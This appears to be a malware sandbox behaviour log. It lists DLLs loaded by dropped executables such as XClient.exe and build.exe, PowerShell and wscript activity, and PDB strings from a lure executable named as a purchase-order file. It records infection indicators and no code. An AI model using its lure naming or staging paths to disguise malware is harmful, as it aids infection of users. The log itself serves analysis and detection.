Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\build.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Section loaded: winmm.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: msasn1.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: mpr.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: secur32.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\XClient.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Static file information: File size 1840128 > 1048576
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.1667592386.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: $$.pdb source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdbr source: RegSvcs.exe, 00000015.00000002.1436320311.0000000000779000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000003.1221869185.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.1741573963.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1751690335.0000000000530000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1740392594.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 00000015.00000002.1437238320.0000000000976000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.1373522037.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.1525511064.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
